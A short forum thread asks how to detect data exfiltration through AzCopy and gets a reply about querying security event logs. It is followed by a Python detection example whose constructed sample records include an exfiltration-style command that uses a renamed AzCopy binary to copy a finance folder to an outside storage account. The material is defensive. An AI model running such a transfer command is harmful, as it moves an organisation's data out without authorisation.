Jun 19 2021 11:12 AM
What are the best ways to monitor for this type of event: Exfiltrating data by transfering it to the cloud with Azcopy – Microsoft 365 Security (m365internals... ?
Jun 20 2021 09:12 AM
@Dean Gross I haven't actually tried this, but I would think you could search the Event and SecurityEvent tables for the azcopy command and then filter based on the file you are looking for. Of course, a smart person would rename the file before trying to upload it, so you may want to see if the URL it is sending the data to is external to your company.
Take a look at this blog post to give you an idea on how to do this: Monitor and Hunting P0w3rSh3LL with Azure Sentinel (eshlomo.us)
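
The check suggested in the reply above, as an added example that is not part of the thread: it flags a transfer by its arguments and destination rather than by the binary name, and treats any storage account outside an allowlist as external. The field names follow the SecurityEvent process-creation columns; `OWN_ACCOUNTS`, the account names and the sample records are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: storage accounts your organisation owns (constructed names).
OWN_ACCOUNTS = {"contosoprod", "contosobackup"}
TRANSFER_VERBS = {"copy", "cp", "sync"}  # AzCopy transfer subcommands
URL = re.compile(r"https://[^\s\"']+", re.IGNORECASE)
STORAGE_HOST = re.compile(r"^([a-z0-9]{3,24})\.(blob|dfs|file)\.core\.windows\.net$")


def destination_account(command_line):
    """Return the storage account a transfer writes to, or None.
    AzCopy takes `<verb> <source> <destination> [flags]`, so the destination
    is a URL only when nothing but flags follows the last URL."""
    matches = list(URL.finditer(command_line))
    if not matches:
        return None
    last = matches[-1]
    tail = command_line[last.end():].strip(" \"'")
    if tail and not tail.startswith("-"):
        return None  # a local path follows the URL: download, not upload
    host = (urlsplit(last.group()).hostname or "").lower()
    found = STORAGE_HOST.match(host)
    return found.group(1) if found else None


def classify(event):
    """Label one process-creation record as (verdict, account, renamed)."""
    cmd = event["CommandLine"]
    image = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    is_transfer = bool(TRANSFER_VERBS & set(cmd.lower().split()))
    account = destination_account(cmd)
    if is_transfer and account and account not in OWN_ACCOUNTS:
        # Matches on arguments and destination, so a renamed binary still hits.
        return ("external-upload", account, "azcopy" not in image)
    return ("ignore", account, False)


# Constructed sample records, not real telemetry.
SAMPLE = [
    {"NewProcessName": r"C:\Tools\azcopy.exe",
     "CommandLine": r'azcopy.exe copy "C:\Finance" "https://contosoprod.blob.core.windows.net/bk?sv=PLACEHOLDER" --recursive'},
    {"NewProcessName": r"C:\Users\Public\svchelper.exe",
     "CommandLine": r'svchelper.exe copy C:\Finance https://examplestore01.blob.core.windows.net/drop?sv=PLACEHOLDER --recursive'},
    {"NewProcessName": r"C:\Tools\azcopy.exe",
     "CommandLine": r'azcopy.exe copy https://examplestore01.blob.core.windows.net/pkg/setup.zip C:\Temp'},
]
RESULTS = [classify(e) for e in SAMPLE]
```

Process-creation records only carry a command line when command-line auditing is enabled on the endpoints, so confirm that field is populated before relying on a check like this.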